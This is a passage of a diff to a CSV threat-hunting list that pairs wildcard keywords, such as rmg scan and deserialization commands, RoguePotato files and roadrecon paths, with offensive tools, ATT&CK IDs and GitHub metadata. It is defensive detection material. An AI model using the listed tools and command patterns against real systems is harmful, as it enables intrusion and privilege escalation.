TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation 
tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" +"*rmg bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java 
RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *http* --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - 
TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg scan * --ports 
*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial * AnTrinh * --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used 
to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - 
TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" "*roastinthemiddle -i * -t * -u *.txt -g *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "*RobustPentestMacro*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*ROCAVulnerabilityTester*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" -"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*rockyou.txt.gz*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 
- T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RogueSploit*","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. 
browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*rookuu/BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*Root 
